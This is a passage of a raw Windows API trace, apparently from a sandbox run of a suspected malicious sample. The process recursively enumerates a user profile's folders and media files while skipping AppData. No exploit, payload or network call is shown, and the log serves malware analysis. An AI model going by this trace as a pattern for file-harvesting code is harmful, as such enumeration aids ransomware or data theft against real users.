ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x657690, cFileName="SendTo", cAlternateFileName="")) returned 1 [0074.618] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SendTo", cchCount1=6, lpString2="AppData", cchCount2=7) returned 3 [0074.619] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.619] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x77c6e0d2, ftCreationTime.dwLowDateTime=0x76b318, ftCreationTime.dwHighDateTime=0x50, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x76ac06, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x85d028b, nFileSizeHigh=0xb8c12, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="", cAlternateFileName="?haဓ\x03\x10")) returned 0xffffffff [0074.619] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x657690, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0074.619] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Start Menu", cchCount1=10, lpString2="AppData", cchCount2=7) returned 3 [0074.619] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.619] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x77c6e0d2, ftCreationTime.dwLowDateTime=0x76b348, ftCreationTime.dwHighDateTime=0x60, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x76ac06, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x85d028b, nFileSizeHigh=0xb8c3b, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="", cAlternateFileName="?haဓ\x03\x10")) returned 0xffffffff [0074.620] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x657690, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0074.620] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Templates", cchCount1=9, lpString2="AppData", cchCount2=7) returned 3 [0074.620] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.621] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x77c6e0d2, ftCreationTime.dwLowDateTime=0x76b318, ftCreationTime.dwHighDateTime=0x60, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x76ac06, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x85d028b, nFileSizeHigh=0xb8c64, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="", cAlternateFileName="?haဓ\x03\x10")) returned 0xffffffff [0074.621] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdad83aa0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdad83aa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x61e84c, dwReserved1=0x657690, cFileName="Videos", cAlternateFileName="")) returned 1 [0074.621] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos", cchCount1=6, lpString2="AppData", cchCount2=7) returned 3 [0074.621] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.621] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdad83aa0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdad83aa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8a38 [0074.621] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdad83aa0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdad83aa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.621] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35803a20, ftCreationTime.dwHighDateTime=0x1d5e1af, ftLastAccessTime.dwLowDateTime=0xccfc6ac0, ftLastAccessTime.dwHighDateTime=0x1d5e3c3, ftLastWriteTime.dwLowDateTime=0xccfc6ac0, ftLastWriteTime.dwHighDateTime=0x1d5e3c3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="0ntYY6p", cAlternateFileName="")) returned 1 [0074.621] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ntYY6p", cchCount1=7, lpString2="AppData", cchCount2=7) returned 1 [0074.621] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.621] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\*", lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35803a20, ftCreationTime.dwHighDateTime=0x1d5e1af, ftLastAccessTime.dwLowDateTime=0xccfc6ac0, ftLastAccessTime.dwHighDateTime=0x1d5e3c3, ftLastWriteTime.dwLowDateTime=0xccfc6ac0, ftLastWriteTime.dwHighDateTime=0x1d5e3c3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8af8 [0074.622] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35803a20, ftCreationTime.dwHighDateTime=0x1d5e1af, ftLastAccessTime.dwLowDateTime=0xccfc6ac0, ftLastAccessTime.dwHighDateTime=0x1d5e3c3, ftLastWriteTime.dwLowDateTime=0xccfc6ac0, ftLastWriteTime.dwHighDateTime=0x1d5e3c3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.622] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc8e0e70, ftCreationTime.dwHighDateTime=0x1d5e803, ftLastAccessTime.dwLowDateTime=0x46566030, ftLastAccessTime.dwHighDateTime=0x1d5dc83, ftLastWriteTime.dwLowDateTime=0x46566030, ftLastWriteTime.dwHighDateTime=0x1d5dc83, nFileSizeHigh=0x0, nFileSizeLow=0xfcbc, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="-AawcGHZf1n-uzNR9.mp4", cAlternateFileName="-AAWCG~1.MP4")) returned 1 [0074.622] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e4feb80, ftCreationTime.dwHighDateTime=0x1d5daaa, ftLastAccessTime.dwLowDateTime=0xfe4da90, ftLastAccessTime.dwHighDateTime=0x1d5d7b0, ftLastWriteTime.dwLowDateTime=0xfe4da90, ftLastWriteTime.dwHighDateTime=0x1d5d7b0, nFileSizeHigh=0x0, nFileSizeLow=0xaee7, dwReserved0=0x10, dwReserved1=0x657690, cFileName="aXsAYPuZRSCYMOeip6.mkv", cAlternateFileName="AXSAYP~1.MKV")) returned 1 [0074.622] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc71b0f80, ftCreationTime.dwHighDateTime=0x1d5e0cb, ftLastAccessTime.dwLowDateTime=0xf8e453b0, ftLastAccessTime.dwHighDateTime=0x1d5d972, ftLastWriteTime.dwLowDateTime=0xf8e453b0, ftLastWriteTime.dwHighDateTime=0x1d5d972, nFileSizeHigh=0x0, nFileSizeLow=0xc1eb, dwReserved0=0x10, dwReserved1=0x657690, cFileName="IipHJEO8.mp4", cAlternateFileName="")) returned 1 [0074.622] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7559120, ftCreationTime.dwHighDateTime=0x1d5dcb8, ftLastAccessTime.dwLowDateTime=0x94e2e2b0, ftLastAccessTime.dwHighDateTime=0x1d5db88, ftLastWriteTime.dwLowDateTime=0x94e2e2b0, ftLastWriteTime.dwHighDateTime=0x1d5db88, nFileSizeHigh=0x0, nFileSizeLow=0x18cd8, dwReserved0=0x10, dwReserved1=0x657690, cFileName="sQ9weB5Cn_9JdUcj7P.mp4", cAlternateFileName="SQ9WEB~1.MP4")) returned 1 [0074.622] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0xf60066, ftCreationTime.dwLowDateTime=0xc39b3, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0x1340067, nFileSizeHigh=0xc39b3, nFileSizeLow=0x6b9ac8, dwReserved0=0x10, dwReserved1=0x657690, cFileName="sQ\x08", cAlternateFileName="haဓ\x03\x10")) returned 0 [0074.622] FindClose (in: hFindFile=0x6b8af8 | out: hFindFile=0x6b8af8) returned 1 [0074.622] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e8d1720, ftCreationTime.dwHighDateTime=0x1d5e710, ftLastAccessTime.dwLowDateTime=0x23a8b590, ftLastAccessTime.dwHighDateTime=0x1d5e71b, ftLastWriteTime.dwLowDateTime=0x23a8b590, ftLastWriteTime.dwHighDateTime=0x1d5e71b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="CCOSsWXcEV8ZF", cAlternateFileName="CCOSSW~1")) returned 1 [0074.622] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CCOSsWXcEV8ZF", cchCount1=13, lpString2="AppData", cchCount2=7) returned 3 [0074.622] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.622] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\*", lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e8d1720, ftCreationTime.dwHighDateTime=0x1d5e710, ftLastAccessTime.dwLowDateTime=0x23a8b590, ftLastAccessTime.dwHighDateTime=0x1d5e71b, ftLastWriteTime.dwLowDateTime=0x23a8b590, ftLastWriteTime.dwHighDateTime=0x1d5e71b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8af8 [0074.623] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e8d1720, ftCreationTime.dwHighDateTime=0x1d5e710, ftLastAccessTime.dwLowDateTime=0x23a8b590, ftLastAccessTime.dwHighDateTime=0x1d5e71b, ftLastWriteTime.dwLowDateTime=0x23a8b590, ftLastWriteTime.dwHighDateTime=0x1d5e71b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.623] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x687dfa70, ftCreationTime.dwHighDateTime=0x1d5e7ae, ftLastAccessTime.dwLowDateTime=0xdc4fcb20, ftLastAccessTime.dwHighDateTime=0x1d5e3aa, ftLastWriteTime.dwLowDateTime=0xdc4fcb20, ftLastWriteTime.dwHighDateTime=0x1d5e3aa, nFileSizeHigh=0x0, nFileSizeLow=0x1227e, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="7999fJY.mkv", cAlternateFileName="")) returned 1 [0074.623] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2d108d0, ftCreationTime.dwHighDateTime=0x1d5e51b, ftLastAccessTime.dwLowDateTime=0x4261b480, ftLastAccessTime.dwHighDateTime=0x1d5da61, ftLastWriteTime.dwLowDateTime=0x4261b480, ftLastWriteTime.dwHighDateTime=0x1d5da61, nFileSizeHigh=0x0, nFileSizeLow=0x8fd6, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="GwLjRbpo46x9NeDS.mkv", cAlternateFileName="GWLJRB~1.MKV")) returned 1 [0074.623] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde8559c0, ftCreationTime.dwHighDateTime=0x1d5e560, ftLastAccessTime.dwLowDateTime=0x460bbc0, ftLastAccessTime.dwHighDateTime=0x1d5e69d, ftLastWriteTime.dwLowDateTime=0x460bbc0, ftLastWriteTime.dwHighDateTime=0x1d5e69d, nFileSizeHigh=0x0, nFileSizeLow=0x71e4, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="S8EN.mkv", cAlternateFileName="")) returned 1 [0074.623] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x1340066, ftCreationTime.dwLowDateTime=0xc3a16, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x11, ftLastWriteTime.dwHighDateTime=0xf40067, nFileSizeHigh=0xc3a16, nFileSizeLow=0x6b9ac8, dwReserved0=0x10, dwReserved1=0x657690, cFileName="S8\x08", cAlternateFileName="haဓ\x03\x10")) returned 0 [0074.624] FindClose (in: hFindFile=0x6b8af8 | out: hFindFile=0x6b8af8) returned 1 [0074.624] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc22a3ef0, ftCreationTime.dwHighDateTime=0x1d5e70c, ftLastAccessTime.dwLowDateTime=0xa9d8a260, ftLastAccessTime.dwHighDateTime=0x1d5daaa, ftLastWriteTime.dwLowDateTime=0xa9d8a260, ftLastWriteTime.dwHighDateTime=0x1d5daaa, nFileSizeHigh=0x0, nFileSizeLow=0x1ceb, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="cWKRu.avi", cAlternateFileName="")) returned 1 [0074.624] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x10, dwReserved1=0x657690, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0074.624] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe85f1720, ftCreationTime.dwHighDateTime=0x1d5d998, ftLastAccessTime.dwLowDateTime=0xa90743f0, ftLastAccessTime.dwHighDateTime=0x1d5e342, ftLastWriteTime.dwLowDateTime=0xa90743f0, ftLastWriteTime.dwHighDateTime=0x1d5e342, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Ffd495B2eqP", cAlternateFileName="FFD495~1")) returned 1 [0074.624] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ffd495B2eqP", cchCount1=11, lpString2="AppData", cchCount2=7) returned 3 [0074.624] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.624] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\*", lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe85f1720, ftCreationTime.dwHighDateTime=0x1d5d998, ftLastAccessTime.dwLowDateTime=0xa90743f0, ftLastAccessTime.dwHighDateTime=0x1d5e342, ftLastWriteTime.dwLowDateTime=0xa90743f0, ftLastWriteTime.dwHighDateTime=0x1d5e342, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8af8 [0074.624] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe85f1720, ftCreationTime.dwHighDateTime=0x1d5d998, ftLastAccessTime.dwLowDateTime=0xa90743f0, ftLastAccessTime.dwHighDateTime=0x1d5e342, ftLastWriteTime.dwLowDateTime=0xa90743f0, ftLastWriteTime.dwHighDateTime=0x1d5e342, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.624] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff468790, ftCreationTime.dwHighDateTime=0x1d5dfb3, ftLastAccessTime.dwLowDateTime=0xdf92db70, ftLastAccessTime.dwHighDateTime=0x1d5d9d6, ftLastWriteTime.dwLowDateTime=0xdf92db70, ftLastWriteTime.dwHighDateTime=0x1d5d9d6, nFileSizeHigh=0x0, nFileSizeLow=0x6ccb, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="sw3Tjl.mkv", cAlternateFileName="")) returned 1 [0074.624] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdac5c230, ftCreationTime.dwHighDateTime=0x1d5e3ca, ftLastAccessTime.dwLowDateTime=0x34054cb0, ftLastAccessTime.dwHighDateTime=0x1d5d919, ftLastWriteTime.dwLowDateTime=0x34054cb0, ftLastWriteTime.dwHighDateTime=0x1d5d919, nFileSizeHigh=0x0, nFileSizeLow=0x14d15, dwReserved0=0x10, dwReserved1=0x657690, cFileName="VGkX.swf", cAlternateFileName="")) returned 1 [0074.624] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x954c2e20, ftCreationTime.dwHighDateTime=0x1d5e3d3, ftLastAccessTime.dwLowDateTime=0xbfc92110, ftLastAccessTime.dwHighDateTime=0x1d5e425, ftLastWriteTime.dwLowDateTime=0xbfc92110, ftLastWriteTime.dwHighDateTime=0x1d5e425, nFileSizeHigh=0x0, nFileSizeLow=0xb330, dwReserved0=0x10, dwReserved1=0x657690, cFileName="xhiatAIn2v.avi", cAlternateFileName="XHIATA~1.AVI")) returned 1 [0074.624] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0xf40066, ftCreationTime.dwLowDateTime=0xc3a93, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xf00067, nFileSizeHigh=0xc3a93, nFileSizeLow=0x23, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="a\x08", cAlternateFileName="haဓ\x03\x10")) returned 0 [0074.625] FindClose (in: hFindFile=0x6b8af8 | out: hFindFile=0x6b8af8) returned 1 [0074.625] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef505ee0, ftCreationTime.dwHighDateTime=0x1d5d876, ftLastAccessTime.dwLowDateTime=0x8a412710, ftLastAccessTime.dwHighDateTime=0x1d5e824, ftLastWriteTime.dwLowDateTime=0x8a412710, ftLastWriteTime.dwHighDateTime=0x1d5e824, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="FoKJzmJBM6_F0eozYZo", cAlternateFileName="FOKJZM~1")) returned 1 [0074.625] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FoKJzmJBM6_F0eozYZo", cchCount1=19, lpString2="AppData", cchCount2=7) returned 3 [0074.625] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.625] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\*", lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef505ee0, ftCreationTime.dwHighDateTime=0x1d5d876, ftLastAccessTime.dwLowDateTime=0x8a412710, ftLastAccessTime.dwHighDateTime=0x1d5e824, ftLastWriteTime.dwLowDateTime=0x8a412710, ftLastWriteTime.dwHighDateTime=0x1d5e824, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8af8 [0074.625] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef505ee0, ftCreationTime.dwHighDateTime=0x1d5d876, ftLastAccessTime.dwLowDateTime=0x8a412710, ftLastAccessTime.dwHighDateTime=0x1d5e824, ftLastWriteTime.dwLowDateTime=0x8a412710, ftLastWriteTime.dwHighDateTime=0x1d5e824, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.625] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11d91460, ftCreationTime.dwHighDateTime=0x1d5e6a1, ftLastAccessTime.dwLowDateTime=0x45eed560, ftLastAccessTime.dwHighDateTime=0x1d5e2d1, ftLastWriteTime.dwLowDateTime=0x45eed560, ftLastWriteTime.dwHighDateTime=0x1d5e2d1, nFileSizeHigh=0x0, nFileSizeLow=0x1418f, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="-4jYTdy7DTgQ 7n_RHA.swf", cAlternateFileName="-4JYTD~1.SWF")) returned 1 [0074.625] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3806420, ftCreationTime.dwHighDateTime=0x1d5d9e8, ftLastAccessTime.dwLowDateTime=0x875e0470, ftLastAccessTime.dwHighDateTime=0x1d5da67, ftLastWriteTime.dwLowDateTime=0x875e0470, ftLastWriteTime.dwHighDateTime=0x1d5da67, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="4_L5NHX538Ki1", cAlternateFileName="4_L5NH~1")) returned 1 [0074.625] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.625] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\*", lpFindFileData=0x61de90 | out: lpFindFileData=0x61de90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3806420, ftCreationTime.dwHighDateTime=0x1d5d9e8, ftLastAccessTime.dwLowDateTime=0x875e0470, ftLastAccessTime.dwHighDateTime=0x1d5da67, ftLastWriteTime.dwLowDateTime=0x875e0470, ftLastWriteTime.dwHighDateTime=0x1d5da67, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8bb8 [0074.625] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de90 | out: 